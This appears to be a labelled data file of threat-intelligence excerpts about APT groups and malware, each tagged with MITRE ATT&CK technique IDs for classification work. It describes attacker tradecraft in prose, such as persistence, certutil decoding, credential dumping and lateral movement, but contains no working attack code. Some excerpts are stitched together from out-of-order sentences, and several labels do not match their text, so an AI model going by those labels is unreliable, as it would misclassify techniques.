{"text1":"Fake domains . Our latest Transparent Tribe research confirms that the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. The attackers then used this fake website, which they hosted on a domain that was nearly identical to its legitimate counterpart, to distribute ObliqueRAT. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. Malicious file-sharing domains . Transparent Tribe also regularly registers domains that appear to be legitimate file- and media-sharing services. Lures and targeting . Transparent Tribe uses a variety of themes in their lures that evolved over time. Defense-themed lures . Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Conference attendees . Transparent Tribe also finds attendees of specific conferences to target. HoneyTraps . Transparent Tribe consistently uses alluring documents and file names, commonly referred to as honeytraps, to trick victims into executing malicious content on their endpoints. Transparent Tribe uses generically themed content-hosting domains as well as malicious domains masquerading as legitimate defense-related websites","labels":"['T1583.001']"}
{"text1":"AQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. OverWatch threat hunters also observed an attempt to discover and stop a third-party endpoint detection and response (EDR) service","labels":"['T1562.001', 'T1007', 'T1518.001']"}
{"text1":"Konni malware family use a custom base64 key to encode the content of several files in the exfiltration phase. We observed the same flow of data reconnaissance and exfiltration across all campaigns","labels":"['T1132.001']"}
{"text1":"Another interesting finding is that Bazar Loader has now implemented a Domain Generation Algorithm using the current date as a seed","labels":"['T1568.002']"}
{"text1":"Once the skimmer has the credit card details, it serializes the copied data into a string and encodes it with Base64. Then, it performs a character permutation on the encoded string to make sure it can\u2019t be directly decoded with Base64 decoding","labels":"['T1560.003']"}
{"text1":"The HTTP request retrieves contents of the files present in the repository with an interesting validation which checks that the retrieved file is a PNG. The file that was earlier retrieved was named \u201creadme.png\u201d; this PNG file has one of the malicious modules embedded in it. It then executes GetNumberOfMethods and saves the result obtained by the module. This file committed to the repo contains the result of the commands executed by the module on the target system. To commit the file the malware makes a PUT HTTP request to Github","labels":"['T1564.001']"}
{"text1":"UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note","labels":"['T1204.001', 'T1598.003']"}
{"text1":"Xbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find NO functionality within Xbash that would enable restoration after the ransom is paid","labels":"['T1485']"}
{"text1":"The CoinTicker app also creates a user launch agent, named .espl.plist, that runs the same command periodically","labels":"['T1543.001']"}
{"text1":"This specific key is set to point towards the path of the previously copied Cardinal RAT executable path. The executable will periodically query this registry key to ensure it is set appropriately. If the executable finds the registry key has been deleted, it will re-set it. The Load registry key acts as a persistence mechanism, ensuring that this Cardinal RAT executes every time a user logs on. More information about the Load registry key may be found here","labels":"['T1547.001']"}
{"text1":"The 'ssonsvr.exe' file is a legitimate Citrix executable that will be used to sideload the malicious \u2018pnipcn.dll\u2019 file","labels":"['T1574.002']"}
{"text1":"1) Writes itself to %AppData%\\Microsoft\\Word\\log.ps1 2) Sets up persistence for this file, using a run key. 6) Removes all registry entries that are left behind during the dropper process","labels":"['T1070.004']"}
{"text1":"The process identifiers or PIDs to be hidden are stored in the shared memory \"Global\\<computer_name>.\" If the shared memory doesn't exist, it takes the PID embedded by the first-stage shellcode. In this case, the intention of the malicious code is to hide Waterbear\u2019s backdoor activities from the security product. Therefore, the first-stage shellcode takes the PID of the Windows Service \u2014 which the first-stage shellcode and the succeeding backdoor both inject into \u2014 hides the target process, and embeds that PID into the second-stage shellcode","labels":"['T1055.003']"}
{"text1":"Analysis of the F.bmp image revealed that it is indeed using Least Significant Bit (LSB) Steganography [9,10], a commonly used form of steganography that embeds data in an image without significantly affecting its appearance","labels":"['T1001.002']"}
{"text1":"Smoke Loader not only installs its original sample but also replaces it with a fresh version, which is downloaded from the C&C \u2013 path: http:\/\/<CnC address>\/system32.exe. This trick makes detection more difficult \u2013 updated samples are repacked by a different crypter, may also have their set of C&Cs changed","labels":"['T1105']"}
{"text1":"The MainConnectionIo function checks if the Windows Firewall is enabled, sets the Tcp Keep Alive value and Non-blocking mode connection options and receives data from the remote host through the ReceiveCommandData function. If the communication fails, ZxShell disables the firewall by modifying the registry key","labels":"['T1562.004']"}
{"text1":"Payloads are now hosted on compromised websites. The payloads hosted on these websites consist of seemingly benign BMP image files. The malicious macros download the images and the ObliqueRAT payload is extracted to disk. The ObliqueRAT payload is renamed with the .pif file extension","labels":"['T1027.003']"}
{"text1":"Since version 0.4.1 Creates a new Primary Refresh Token (PRT) as JWT to be used to sign-in as the user","labels":"['T1606.002']"}
{"text1":"PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower","labels":"['T1041']"}
{"text1":"Also, the postinstall script moves the .CrashReporter program to a new location \/Library\/JMTTrader\/CrashReporter and makes it executable. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CrashReporter with the Maintain parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004","labels":"['T1059.004']"}
{"text1":"The HTTP request retrieves contents of the files present in the repository with an interesting validation which checks that the retrieved file is a PNG. The file that was earlier retrieved was named \u201creadme.png\u201d; this PNG file has one of the malicious modules embedded in it. It then executes GetNumberOfMethods and saves the result obtained by the module. This result is committed to the remote repo under the metafiles directory with a filename denoting the time at which the module was executed. This file committed to the repo contains the result of the commands executed by the module on the target system. To commit the file the malware makes a PUT HTTP request to Github","labels":"['T1102.002']"}
{"text1":"The bot attempts to create a MUTEX using the value of variable \u201cVL\u201d to ensure that only one instance of the bot is running. The bot will proceed to create a copy of itself as %TEMP%\/svchost.exe, execute that file, and terminate itself. The newly executed copy will create an autostart registry key to ensure persistence upon system reboot","labels":"['T1547.001']"}
{"text1":"We will discuss the Spark backdoor\u2019s functionality in detail later in this blog, but this specific sample has the following configuration","labels":"['T1027.002']"}
{"text1":"The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators","labels":"['T1124', 'T1082', 'T1069.002']"}
{"text1":"Embedded Downloader Trojan The M payload (referenced previously along with the R payload, above) injected and executed within the memory space of the other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the functional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The payload extracts this VBScript from a resource and saves it to a file that it extracts from another resource. The payload is downloaded from the following location and saved to \"%PUBLIC%\\svchost32.exe","labels":"['T1059.003', 'T1059.001']"}
{"text1":"The script \u201cenu.cmd\u201d created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name \u201cadministrator\u201d in Spanish, Italian, German, French, and English","labels":"['T1562.004', 'T1098']"}
{"text1":"As we can see, the flow is obfuscated. But in Pony this technique is used in more sophisticated way because\u00a0there are some junk instructions added between the PUSH and the RET in addition to a never executed bogus conditional jump","labels":"['T1027']"}
{"text1":"Screenshot: takes system screenshots and saves them to %AppData% before sending them to the C2 via a POST request","labels":"['T1113']"}
{"text1":"If nothing like that is detected, the malware will decrypt the third stage and execute it by using the process hollowing technique, commonly used by malware authors. In this version, the payloads are encrypted with the same XOR-based algorithm as the one used in previous versions, however in this latest version, the payload is encrypted twice, with different keys","labels":"['T1027', 'T1497.001']"}
{"text1":"As mentioned in the table above, version 3 has two forms - one is an independent executable, and the other is a loader that loads a DLL from the resources section and executes it. Even before doing any static \/ dynamic analysis, we can use VirusTotal to determine that the resources section probably contains more data, in this case an encrypted DLL that is loaded into memory","labels":"['T1055.001']"}
{"text1":"As noted, there are two distinct variants of ServHelper: a \u201ctunnel\u201d variant and a \u201cdownloader\u201d variant. The \u201cdownloader\u201d variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader","labels":"['T1021.001']"}
{"text1":"BoomBox proceeds to upload the data above (masquerading as a PDF file) to a dedicated-per-victim-system folder in Dropbox. For demonstration purposes, an example HTTP(s) POST request used to upload the file\/data to Dropbox is included below","labels":"['T1567.002']"}
{"text1":"Exfiltration over control server channel: data is exfiltrated over the control server channel using a custom protocol - Commonly used port: the attackers used common ports such as port 443 for control server communications - Service execution: registers the implant as a service on the victim\u2019s machine - Automated collection: the implant automatically collects data about the victim and sends it to the control server - Data from local system: local system is discovered and data is gathered - Process discovery: implants can list processes running on the system - System time discovery: part of the data reconnaissance method, the system time is also sent to the control server - File deletion:: malware can wipe files indicated by the attacker","labels":"['T1124', 'T1119', 'T1041']"}
{"text1":"The backdoor also collects some rudimentary information about the compromised computer including some basic network adapter information, system version information, and language settings","labels":"['T1016', 'T1082']"}
{"text1":"The exact date when the malware was compiled is unknown \u2013 the recent wrapper DLL samples were tampered with by the malware authors, with the PE timestamps manually set to zero values. However, during our research, we found an earlier version of the malware with a PE timestamp reading Oct 13, 2013, so the compilation date of the later version is almost surely more recent","labels":"['T1070.006']"}
{"text1":"PowerShell Cobalt Strike Beacon -\u00a0New payload + new C2 domain - PowerShell Obfuscator -\u00a0All the new PowerShell payloads are obfuscated using a publicly available script adapted from a Daniel Bohannon\u2019s GitHub project. Using this tool, the attackers could overcome a password reset. Customized Windows Credentials Dumper -\u00a0A PowerShell password dumper that is based on a known password dumping tool, using PowerShell bypass and reflective loading. The attackers specifically used it to obtain Outlook passwords. Customized Outlook Credentials Dumper -\u00a0Inspired by known Outlook credentials dumpers. Mimikatz -\u00a0PowerShell and Binary versions, with multiple layers of obfuscation","labels":"['T1003.001']"}
{"text1":"Any other command that doesn\u2019t fit the above patterns will be forwarded and processed as an argument to \u2018cmd.exe \/c\u2019 and run via the \u2018ShellExecuteW\u2019 API. Additionally, each beacon is accompanied with a screenshot that is initially saved as \u2018scr.jpg\u2019 in the public directory and subsequently issued to the C2 using the same HTTP POST request as in the \u2018uploadsf\u2019 command","labels":"['T1106']"}
{"text1":"The malware uses the AMAP SDK to get accurate location of infected devices by GPS, mobile network (such as base stations), WiFi and other information. MobileOrder acts on instructions provided by its C2 server, which it communicates with over TCP port 3728. All C2 communications are encrypted with the AES algorithm using a key generated by computing five MD5 hashes starting with the key \"1qazxcvbnm\", and adding a salt value of \u201c.)1\/\u201d in each iteration","labels":"['T1082']"}
{"text1":"In order to avoid in-memory scanning during runtime, the payload encrypts all of the function blocks before executing the actual malicious routine. Afterwards, whenever it needs to use a function, it will decrypt the function, execute it, and encrypt the function back again, as can be seen in Figure 4. If a function will not be used on the rest of the execution, it will be scrambled by another mess-up function, as illustrated in Figure 6. The mess-up function muddles up the bytes with random values and makes the input blocks unrecoverable. The purpose of this is to further avoid being detected by a certain cybersecurity solution","labels":"['T1027.005']"}
{"text1":"The malware can also download and execute additional components served to it by the control server. The mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request","labels":"['T1033']"}
{"text1":"Note that the heading of the message box is \u2018ASKOD\u2019, a reference to the Ukrainian electronic document management system. This initiative is meant to enforce electronic digital signatures through the use of cryptographic keys like the \u0410\u043b\u043c\u0430\u0437-1\u041a (transliterated as \u2018Almaz-1K\u2019 or translated to \u2018Diamond-1K\u2019) shown below","labels":"['T1036']"}
{"text1":"It then executes a new instance of itself in a new process. Also, it will remove the original file via the following command that is executed in a batch script named 'date.bat","labels":"['T1059.003', 'T1059.003']"}
{"text1":"The last one is used by this setup, and in this mode the ransomware encrypts the files on all available mapped network drives","labels":"['T1486', 'T1564.006']"}
{"text1":"The library used to hide Winnti\u2019s system activity is a copy of the open-source userland rootkit Azazel\u00b9\u2070, with minor changes. When executed, it will register symbols for multiple commonly used functions, including: open(), rmdir(), and unlink(), and modify their returns to hide the malware\u2019s operations","labels":"['T1014']"}
{"text1":"The arp.exe command is used to display and modify entries in the Address Resolution Protocol (ARP) cache. Adversaries may attempt to use the command to discover remote systems they could compromise","labels":"['T1018']"}
{"text1":"We refer to these attacks as MuddyWater due to the confusion in attributing these attacks. Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related. The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. These attacks have also been tracked by several other researchers on Twitter and elsewhere. The activity has been consistent throughout 2017 and, based on our analysis, targets or is suspected to target, entities in the following countries","labels":"['T1027', 'T1027']"}
{"text1":"FlawedGrace creates, encrypts, and stores a configuration file containing the C&C IPs and ports in a \u201c<hex digits>.dat\u201d file (e.g. C:\\ProgramData\\21851a60.dat\u201d). The first 16 bytes of the file are an AES initialization vector (IV). The rest of the data is AES-encrypted in CBC mode","labels":"['T1027']"}
{"text1":"Capable of stealing documents sent to the printer queue. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies","labels":"['T1539']"}
{"text1":"Once the threat actor mapped the network and obtained credentials (through net use), they began to move laterally. The threat actor relied on WMI and PsExec to move laterally and install their tools across multiple assets","labels":"['T1047']"}
{"text1":"In March 2016, a financially motivated threat actor launched several tailored spear phishing campaigns primarily targeting the retail, restaurant, and hospitality industries. The emails contained variations of Microsoft Word documents with embedded macros that, when enabled, downloaded and executed a malicious downloader that we refer to as PUNCHBUGGY","labels":"['T1566.001']"}
{"text1":"Our dynamic analysis showed Lokibot\u2019s behavior, including the benefits and drawbacks of several unpacking methods. Lokibot also used an infected system machine global unique identifier (GUID) value to generate a mutex (an MD5 hash) that acted as a flag to prevent itself from infecting the same machine again. The subject lines of the campaign messages usually started with or included the term \u201cproforma. The malicious attachment was a DOCX, with a file name that also included \u201cproforma\u201d in its pattern. TLP: WHITE https:\/\/www.us-cert.gov\/tlpCharacteristicsLokibot is an information stealer; the main functionality of its binary is to collect system and application credentials, and user information to send back to the attacker. We conducted dynamic analysis to observe network and system behavior once it infected our Windows OS. It starts from the tenth byte in the data section of the initial TCP POST request. The binary\u2019s hardcoded strings provided data about the binary\u2019s characteristics, behavior, and main functionality.Section HeadersFrom the section headers and distribution of each section, the binary appears to be fairly normal. There are no unusual sections, and the size and distribution of the sections, especially .text, mirrors a standard unpacked binary (Figure 6).File Metadata and StringsThe binary is a PEx86 binary, which can be run on both x86 and 64-bit Windows OS. We determined that the binary was packed because we did not see the C2 URL or any signs of being an information stealer (such as an applications list) in the binary strings and resources","labels":"['T1555']"}
{"text1":"Then it uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12, if a command is available. This backdoor can only execute additional PowerShell scripts. It writes the command results in another OneDrive subfolder and encrypts it with the XOR key 0xAA","labels":"['T1059.001']"}
{"text1":"During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it","labels":"['T1072']"}
{"text1":"Through the use of this platform, the operator was able to monitor and manage various compromised email accounts simultaneously","labels":"['T1586.002']"}
{"text1":"As seen in Figure 7, this .NET executable uses a GitHub repository to obtain and execute a downloader. This repository is now gone, but we were able to download a copy of it while it was still available","labels":"['T1102']"}
{"text1":"Along with the change to using a DLL, Qbot also changed where it stores configuration information on the infected host. Earlier versions of Qbot stored this data within a DAT file in the same randomly named folder as the malicious binary. As of late 2020, this data is now stored in the registry, under a randomly named subkey under HKCU\\Software\\Microsoft. While this move to the registry keeps things a bit more hidden from prying eyes, in both cases the presence of a randomly named value under the Microsoft folder\/key should be cause to investigate","labels":"['T1112']"}
{"text1":"Mandiant has created a\u202ftask force & initiated a Global Event\u202fto track the Russian invasion of Ukraine. Department of State, hosted on a page made to look like another Department of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. There are several similarities and technical overlaps between the 14 November 2018, phishing campaign and the suspected APT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. However, the new campaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and procedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. It has also been over a year since we have conclusively identified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long interlude. The shortcut file was crafted to execute a PowerShell command that read, decoded, and executed additional code from within the shortcut file. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has leveraged large waves of emails in previous campaigns. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON backdoor and decoy PDF. For example, the use of 'FromBase'+0x40+'String', in place of FromBase64String, the PowerShell command used to decode base64. The decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset 0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content","labels":"['T1059.001']"}
{"text1":"The Emissary configuration is now encrypted using a custom algorithm that uses the \"srand\" function to seed the \"rand\" function using a value of 2563. This seed value causes the \"rand\" function to generate the same values each time, which Emissary will use as a key along with the XOR operation. The configuration now contains the version number of Emissary, instead of the version being hardcoded into the Trojan","labels":"['T1027']"}
{"text1":"Actors behind Agent Tesla campaigns have also used malicious Office documents to facilitate first-stage delivery. Specially-crafted documents, exploiting Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570, have been leveraged, even in present day campaigns. These and similar exploits allow for quick delivery and execution with minimal user interaction (beyond opening the malicious documents and allowing active content to proceed","labels":"['T1203']"}
{"text1":"The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server","labels":"['T1074.001']"}
{"text1":"Using previously stolen credentials the attacker logged into a domain controller and copied tools into the %TEMP% directory. Copied tools included AdFind.exe (Active Directory enumeration utility), a batch script (Figure 2), and a copy of the 7-Zip archive utility. Downloaded utilities were copied to C:\\Windows\\SysWOW64\\. - The attacker performed host and network reconnaissance using built-in Windows commands. AdFind.exe was executed using the previously noted batch script, which was crafted to pass the utility a series of commands that were used to collect information about Active Directory users, systems, OUs, subnets, groups, and trust objects. The output from each command was saved to an individual text file alongside the AdFind.exe utility (Figure 2). - This process was performed twice on the same domain controller, 10 hours apart. Between executions of Adfind the attacker tested access to multiple domain controllers in the victim environment, including the one later used to deploy Ryuk. The attacker logged into a domain controller and copied instances of PSExec.exe, a batch script used to kill processes and stop services, and an instance of Ryuk onto the system. Using PsExec the attacker copied the process\/service killing batch script to the %TEMP% folder on hundreds of computers across the victim environment, from which it was then executed. The attacker then used PsExec to copy the Ryuk binary to the %SystemRoot% directories of these same computers","labels":"['T1018']"}
{"text1":"Summary In the past few months, Unit 42 has observed the Patchwork group, alternatively known as Dropping Elephant and Monsoon, conducting campaigns against targets located in the Indian subcontinent. Patchwork threat actors utilized a pair of EPS exploits rolled into legitimate, albeit malicious, documents in order to propagate their updated BADNEWS payload. The use of weaponized legitimate documents is a longstanding operational standard of this group. The BADNEWS malware payload, which these malicious documents ultimately deliver, has been updated since the last public report in December 2017. These changes to BADNEWS, as well as the use of recent EPS-based exploits, demonstrate that the group are actively updating their toolsets in efforts to stay ahead of the security community. In this posting, we detail our findings and document these changes. Delivery The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities. Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability, however in late January 2018 when, paradoxically, newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability. The lures are primarily documents of interest to Pakistani nuclear organizations and the Pakistani military as can be seen in the images below","labels":"['T1203']"}
{"text1":"1) Brute-force using a pre-defined list of usernames and passwords in an attempt to login to Admin panels","labels":"['T1110.001']"}
{"text1":"Sakula obfuscates many of its strings using single-byte XOR obfuscation. Samples with a 2012 compile timestamp use a key value of either 0x88 or 0x56. Samples compiled in 2013 and 2014 use a key value of 0x56, while the lone 2015 sample uses 0x57","labels":"['T1027']"}
{"text1":"We euphemistically refer to the bit fiddling function in the interest of brevity. Looking through it, we see calls to Windows APIs to acquire a cryptographic context provider and generate random bytes. It\u2019s likely this is being used for an inlined crypto implementation and byte overwriting, but the mechanism isn\u2019t entirely clear at this time","labels":"['T1106']"}
{"text1":"A base working directory will contain the files\/folders related to Carbon. This directory is chosen randomly among the folders in %ProgramFiles% but excluding \u201cWindowsApps","labels":"['T1074.001']"}
{"text1":"Kimsuky\u00a0employs a wide variety of malware such as Gold Dragon, Babyshark, Appleseed, etc. The module meant for exfiltrating files from the endpoint uses a distinct filepath list specified by the threat actors.Organizations must remain vigilant against motivated adversaries that conduct targeted attacks","labels":"['T1583.006']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. DGet \u2014 This simple downloader (see Figure 4) is similar to the wget web server retrieval tool. Source: Secureworks) - Screen Capture Tool\u2014 This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use downloaders or other malware to send the new list to a compromised host. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1105']"}
{"text1":"The goal of targeting some victims appears to be to obtain data. How this data is obtained likely differs per victim, but we observed the usage of several custom DLL files used to continuously retrieve data from memory of systems where such data is typically processed","labels":"['T1119']"}
{"text1":"SUNSPOT was identified on disk with a filename of taskhostsvc.exe (SHA256 Hash: c45c9bda8db1d470f1fd0dcc346dc449839eb5ce9a948c70369230af0b3ef168), and internally named taskhostw.exe by its developers. It was likely built on 2020-02-20 11:40:02, according to the build timestamp found in the binary, which is consistent with the currently assessed StellarParticle supply chain attack timeline. StellarParticle operators maintained the persistence of SUNSPOT by creating a scheduled task set to execute when the host boots","labels":"['T1036.005', 'T1053.005']"}
{"text1":"The downloaded file named install_flash_player.exe needs to be manually launched by the victim. To operate correctly, it needs elevated administrative privileges which it attempts to obtain using the standard UAC prompt. If started, it will save the malicious DLL as C:Windowsinfpub.dat and launch it using rundll32","labels":"['T1218.011']"}
{"text1":"The data is encrypted using a series of XOR and addition operations, followed by decompression using the ZLIB library","labels":"['T1573.001']"}
{"text1":"If the user account doesn\u2019t have local administrative or domain administrative permissions, the adversary attempts to discover which local or domain admin accounts exist, and exfiltrates the admin\u2019s usernames. To identify if privileged users are active on remote servers, the adversary makes use of PsLogList from Microsoft Sysinternals to retrieve the Security event logs. The built-in Windows quser-command to show logged on users is also heavily used by them. If such a privileged user was recently active on a server the adversary executes Cobalt Strike\u2019s built-in Mimikatz to dump its password hashes","labels":"['T1087.002']"}
{"text1":"The macro prepends the string -----BEGIN CERTIFICATE----- to the beginning of the base64 encoded payload and appends -----END CERTIFICATE----- to the end of the data. The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension. The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder. The macro sleeps for two seconds and then executes the newly dropped executable. Open-source Delivery Document Generator It appears that Sofacy may have used an open-source tool called Luckystrike to generate the delivery document and\/or the macro used in this attack. Luckystrike, which was presented at DerbyCon 6 in September 2016, is a Microsoft PowerShell-based tool that generates malicious delivery documents by allowing a user to add a macro to an Excel or Word document to execute an embedded payload. We believe Sofacy used this tool, as the macro within their delivery document closely resembles the macros found within Luckystrike. To confirm our suspicions, we generated a malicious Excel file with Luckystrike and compared its macro to the macro found within Sofacy's delivery document. We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload","labels":"['T1140']"}
{"text1":"The first thing this malware does is it copies itself to the startup directory for persistence","labels":"['T1547.001']"}
{"text1":"In this blog post, we provide an in-depth analysis of Linux\/Ebury. It is a sophisticated backdoor used to steal OpenSSH credentials and maintain access to a compromised server. According to previous reports, this backdoor has been in the wild for at least two years. Linux\/Ebury comes in two different shapes: a malicious library and a patch to the main OpenSSH binaries. The malicious library is a modified version of libkeyutils.so. This shared library is loaded by all OpenSSH executables files such as ssh, sshd and ssh-agent. We will describe how the backdoor works and how the OpenSSH functionalities are hooked","labels":"['T1554']"}
{"text1":"Our latest Transparent Tribe research confirms that the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. The victim is encouraged to click on an embedded URL hosted on sharingmymedia[.]com, which then downloads ObliqueRAT, the trojan discovered by Talos in 2020 associated with threat activity targeting entities in South Asia. We cannot confirm how the maldocs were delivered to victims, but we suspect they were probably sent as attachments to phishing emails based on previous threat actor behavior and the targeted nature of this particular lure. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. In such cases, adversaries would deliver phishing maldocs to targets containing a malicious VBA macro that extracted either the CrimsonRAT executable or a ZIP archive embedded in the maldoc. The macro dropped the implant to the disk, setting up persistence mechanisms and eventually executing the payload on the infected endpoint. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc. Figure 2 shows the attackers' use of HTTrack, a free website copier program, to duplicate a legitimate website to use for their own malicious purposes. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. The malicious domain prompts the victim to enter their name and email address to sign up and download a seemingly important \"guide on pay and allowance","labels":"['T1608.004']"}
{"text1":"It uses the string 5cd8f17f4086744065eb0992a09e05a2 as its mutex as well as its registry hive in the affected machine. It uses the value\u00a0tcpClient_0 as its HTTP server, where it will receive all stolen information from the infected machine. However, since the value was set to null, all stolen information will be sent to the same C&C server","labels":"['T1041']"}
{"text1":"The recording of audio data from the internal microphone is also rather new. Of course, other malware exists which can record audio, but key here is Flame\u2019s completeness \u2013 the ability to steal data in so many different ways","labels":"['T1123']"}
{"text1":"PipeMon\u2019s first stage consists of a password-protected RARSFX executable embedded in the .rsrc section of its launcher. Once written to disk, the RARSFX is executed with CreateProcess by providing the decryption password in an argument, as follows","labels":"['T1106']"}
{"text1":"Finally, after the initial beaconing, receiving a configuration, and exfiltrating stolen information from the infected machine, AZORult may download the next payload. For example, in the campaign described at the beginning of this post, AZORult downloads Hermes 2.1 ransomware after it exfiltrates the victim\u2019s data and credentials","labels":"['T1105']"}
{"text1":"While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object","labels":"['T1497.002']"}
{"text1":"The Bazar Loader malware was using a code signing certificate signed by Digicert under the organization NOSOV SP Z O O","labels":"['T1588.003']"}
{"text1":"The sample checks that the machine is domain joined and retrieves the domain name before execution continues. A userID is generated by computing the MD5 of a network interface MAC address that is up and not a loopback device, the domain name, and the registry value HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid","labels":"['T1016']"}
{"text1":"The worm also includes code to scan for open Docker API\u2019s using masscan, then spin up docker images and install itself","labels":"['T1046']"}
{"text1":"The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer","labels":"['T1036']"}
{"text1":"Sakula also leverages single-byte XOR encoding to obfuscate various strings and files embedded in the resource section, which are subsequently used for User Account Control (UAC) bypass on both 32 and 64-bit systems. Analysis . CTU researchers performed detailed analysis on 346 Sakula samples, including the installer and all dropped files used by the malware to run. Source: Dell SecureWorks) . Installation . In most of the samples collected by the CTU research team, Sakula maintains persistence by setting the registry Run key (SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\) in either the HKLM or HKCU hive. In the samples compiled in 2014, the adversary switched to adding the Run key by invoking cmd.exe: The registry value and filename vary by sample. Three of the analyzed samples placed files in %APPDATA%, while the remaining Sakula samples placed files in a directory under %ALLUSERSPROFILE%. A small number of samples did not use an additional subdirectory. The msi.dll file is configured to read and XOR-decode setup.msi, also located in the same directory, and run it in memory. Based on whether the compromised system is 32-bit or 64-bit, the appropriate file is written and run using cmd.exe calling rundll32 on the DLL with the PlayWin32 or PlayWin64 export. Center509671.dat). In a small group of Sakula samples from 2013, the install process also modified the hosts file to point some of the victim's subdomains to various IP addresses within the victim's own organization. The malware also registered a file as a command component within the registry. In the Sakula samples where the install process performed 